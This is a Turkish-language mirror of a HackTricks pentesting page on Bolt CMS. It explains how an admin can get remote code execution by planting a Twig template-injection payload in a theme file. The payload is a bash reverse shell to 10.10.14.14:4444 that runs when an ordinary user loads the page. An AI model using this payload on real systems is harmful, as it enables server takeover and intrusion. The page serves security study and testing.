mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
3.4 KiB
3.4 KiB
Bolt CMS
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'ı takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
RCE
Admin olarak giriş yaptıktan sonra (giriş istemine erişmek için /bot'a gidin), Bolt CMS'de RCE alabilirsiniz:
Configuration->View Configuration->Main Configurationseçin veya URL yoluna/bolt/file-edit/config?file=/bolt/config.yamlgidin- Tema değerini kontrol edin
File management->View & edit templatesseçin- Önceki adımda bulunan tema tabanını seçin (
base-2021bu durumda) veindex.twigseçin - Benim durumumda bu URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig
- Bu dosyada template injection (Twig) ile yüklemenizi ayarlayın, örneğin:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - Ve değişiklikleri kaydedin
Maintenance->Clear the cachekısmında önbelleği temizleyin- Sayfaya tekrar normal bir kullanıcı olarak erişin ve yükleme çalıştırılmalıdır
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'ı takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.